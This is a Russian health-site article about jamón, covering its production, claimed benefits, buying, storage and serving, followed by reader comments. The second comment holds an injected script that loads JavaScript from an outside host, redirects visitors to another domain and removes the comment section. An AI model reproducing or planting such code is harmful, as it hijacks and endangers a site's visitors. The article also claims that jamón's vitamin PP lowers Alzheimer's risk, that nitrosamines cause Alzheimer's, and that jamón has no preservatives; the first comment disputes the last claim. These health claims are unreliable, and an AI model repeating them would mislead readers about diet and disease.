Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Испанские страсти по еде....  >>  Испанские страсти по еде. Как правильно подавать хамон
 
Обратная связь
 

Испанские страсти по еде. Как правильно подавать хамон

Размер шрифта
27 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Когда-то хамон был обычной пищей испанских конкистадоров, которой они запасались для дальней дороги. Теперь это драгоценный деликатес. Но есть ли польза в этом дорогом продукте? И как его правильно выбрать и приготовить?

1

Испанский национальный деликатес хамон – это сыровяленый свиной окорок. Испанцы готовили его с древних времен: первые письменные доказательства датируются временами Римской Империи. С тех пор способ его приготовления не изменился, он так же прост, как и раньше.

Способ приготовления хамона

  1. Свиную ногу с копытом (обязательно) покрывают морской солью и оставляют на 2 недели, чтобы она частично просолилась, а соль впитала влагу.

  2. Затем с мяса смывают соль, подвешивают ногу за копытце в сушильном сарае для стекания жира и вяленья.

  3. Процесс вяленья мяса натуральный. В течение 2-х лет мясо завяливается естественным путем, постепенно превращаясь в ветчину – хамон.

Сейчас производство хамона стало более технологичным, что обеспечивает и лучшее качество мяса, и его безопасность.

Достоинства хамона

  • Как и любое мясо, хамон является источником белка для мышц и железа для крови.
  • Витамин PP в хамоне необходим для когнитивной функции мозга и помогает снижать риск деменций и болезни Альцгеймера. От уровня этого витамина в организме зависит, насколько точно нервные импульсы передаются в мозг.
  • В хамоне есть мононенасыщенные жирные кислоты, например олеиновая кислота, которая улучшает количество хорошего и уменьшает количество плохого холестерина.
  • Хамон готовится без консервантов и поэтому не образует в организме очень вредных нитрозаминов, которые вызывают болезнь Альцгеймера.

1
На фото: макет, имитирующий передачу нервных импульсов

Пьедестал почета по содержанию витамина PP в 100 г продукта:

Хамон
Ветчина свиная, некопченая
Копченая свинина

В любом переработанном мясе – консерванты, опасные для мозга. Этим и хоро хамон – в нем нет опасных консервантов.

Плохое о продукте

Хамон соленый и жирный продукт. Именно поэтому хамон – это только деликатес и употреблять его надо в небольших количествах. Людям с гипертонией и лишним весом лучше не употреблять хамон.

Как выбрать

  • Покупать хамон лучше цельным куском, а не в вакуумной упаковке. Но если вы решили купить хамон в нарезке, на его упаковке в разделе «Состав» должно быть написано только одно слово «хамон», тем более там не должно быть консервантов или других компонентов.
  • Качество хамона гарантируется сертификатом. Например, Европейский Союз защищает процесс производства хамона Серрано посредством сертификации TSG – патент на защищенное наименование места происхождения товара.
  • Хамон должен быть произведен только в Испании, все остальное - не подлинный хамон, что не гарантирует его качества.

Как хранить

Если у вас цельный хамон на кости, то его надо хранить в прохладном (+ 5-7 °C), сухом и хорошо вентилируемом помещении на хамонеро (особой подставке), либо в подвешенном состоянии.

Чтобы сохранить свежесть и вкус хамона, всегда накрывайте надрезанную часть окорока отрезанным куском жира.

Как правильно съесть

В Испании работают специалисты по обвалке (нарезке) хамона – хамонеро. Для начала, с хамона нужно срезать несколько верхних жирных пластин. Добравшись до мяса, нужно подрезать его очень тонкими ломтиками и выкладывать на теплую тарелку, лучше – на деревянную. Перед его употреблением подождите, пока мясо немного заветрится. Тогда оно будет еще вкуснее.

Хамон нужно подавать в виде самостоятельной закуски, но обязательно с овощами или фруктами, которые помогут замаскировать негативные качества хамона через действие клетчатки и других веществ.

Рецепт. Хамон с дыней

Приготовить это блюдо очень просто: можно наколоть на шпажки кусочки дыни и ломтики хамона, или, наоборот, завернуть дыню в ломтики хамона. Оба этих варианта подарят одинаково сказочный вкус хамона.



Cюжеты по теме:
Испанские страсти по еде. Как правильно подавать хамон

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 августа 2013 в 17:29

Цитировать   |   Пожаловаться

На счет консервантов не совсем верно. Консерванты Е-250 и Е-252 есть как в нарезке, так и в целых окороках. Чтобы в этом убедиться, достаточно изучить этикетку. Конечно, существуют в Испании хамоньеро, которые делают хамон без консервантов, но у нас найти такой хамон очень непросто!

2 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.